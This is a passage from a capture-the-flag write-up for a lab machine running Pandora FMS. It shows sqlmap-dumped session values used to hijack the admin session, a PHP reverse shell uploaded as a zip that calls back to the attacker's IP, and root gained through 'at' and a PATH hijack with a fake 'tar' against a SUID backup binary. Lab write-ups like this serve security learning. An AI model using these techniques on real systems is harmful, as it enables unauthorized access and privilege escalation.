| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5g6l76p4mncnest9ot5hr7opv1 | id_usuario|s:5:"admin"; | 1648660377 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 6up1pgja7ic6tti8uoqu641vi3 | NULL | 1648661423 |
| 7cv0ph58mnnfpu45mh9mj3nv0v | NULL | 1648661212 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 92h891j6qs18hn1k2e4r9vlg39 | NULL | 1648661546 |
| 9dn1mbgeq1fljfhjsh9sk80asl | NULL | 1648661124 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| amn2o2cejcplib5qgjdv8cl2l6 | NULL | 1648659314 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| d59vtcusej59n46nn82rnv78n0 | NULL | 1648658750 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hhjlv9j3fvb96gurpogjkg10jb | id_usuario|s:5:"admin"; | 1648660258 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| j2bo9tvhgn1e6sb5u03p8101hc | NULL | 1648661270 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| koihrjg9bqn35hjos4mdrdmie7 | id_usuario|s:6:"daniel"; | 1648660800 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| oc1um2oum4n98a6d7fku241r56 | NULL | 1648660640 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| pjigpi88mlmmkllqfqh4ap2kmr | NULL | 1648661225 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| q9oqum7kba0n0pip0626gjluea | NULL | 1648659478 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| tg6ehatvu0t8dps35nod40ph1c | NULL | 1648661158 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
| ur7c35ngmoai7gs36odft79f9j | NULL | 1648661348 |
+----------------------------+-----------------------------------------------------+-------------+
[13:29:22] [INFO] table 'pandora.tsessions_php' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/pandora/tsessions_php.csv'
[13:29:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'
[*] ending @ 13:29:22 /2022-03-30/
So we have session values for admin as well. The other tables look less interesting.
Cracking matt's password hash did not work, so it seems we have to move on with the session values.
After injecting the admin session and reloading, it displays a dashboard. So we have done session hijacking for the admin user.
Since we are able to access Admin Tools in the dashboard, we can get RCE by uploading a PHP reverse shell as a zip, which is mentioned in this exploit video
Using the pentestmonkey PHP reverse shell,
┌──(kali㉿aidenpearce369)-[~]
└─$ head shell.php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.5'; // CHANGE THIS
$port = 9876; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
┌──(kali㉿aidenpearce369)-[~]
└─$ zip shell.zip shell.php
adding: shell.php (deflated 60%)
After uploading this zip, load the file manager page to execute the shell
┌──(kali㉿aidenpearce369)-[~]
└─$ nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.136] 59936
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
17:51:13 up 2:56, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.14.5 16:16 12:56 0.18s 0.18s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$whoami
matt
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ cd /home/matt
$ cat user.txt
<USER FLAG>
Escalating Privileges To Root
Listing the SUID binaries,
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
It's time to exploit /usr/bin/pandora_backup
Changing to an interactive shell,
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
matt@pandora:/home/matt$ ls
ls
user.txt
Copying the SUID binary to the local machine,
matt@pandora:/home/matt$ cp /usr/bin/pandora_backup .
cp /usr/bin/pandora_backup .
matt@pandora:/home/matt$ ls
ls
pandora_backup user.txt
matt@pandora:/home/matt$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.5 - - [30/Mar/2022 17:58:54] "GET /pandora_backup HTTP/1.1" 200 -
Running strings on the binary shows its operation
┌──(kali㉿aidenpearce369)-[~]
└─$ strings pandora_backup
...
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
...
In order to exploit this, we need an elevated shell with no restriction; for that we can use the /usr/bin/at SUID binary to bypass it.
Now we can confirm that we have an elevated shell,
matt@pandora:/$ ls /tmp
ls /tmp
matt@pandora:/$
echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
matt@pandora:/$
<(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 2 at Wed Mar 30 18:23:00 2022
/bin/sh: 0: can't access tty; job control turned off
$ $ ls /tmp
ls /tmp
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-apache2.service-g5jfnj
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-logind.service-r0r3ug
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-resolved.service-dpsyag
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-timesyncd.service-6opwTh
tmux-1001
vmware-root_697-3988163015
We can easily exploit this SUID binary to drop a root shell, because the tar command used here doesn't use an absolute path.
Now crafting our malicious tar binary and abusing the $PATH variable,
$ cd /tmp
cd /tmp
$ echo "/bin/sh -p" >tar
echo "/bin/sh -p" >tar
$ chmod +x tar
chmod +x tar
$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
$ /usr/bin/pandora_backup
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
/bin/sh: 0: can't access tty; job control turned off
# id
id
uid=0(root) gid=1000(matt) groups=1000(matt)
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>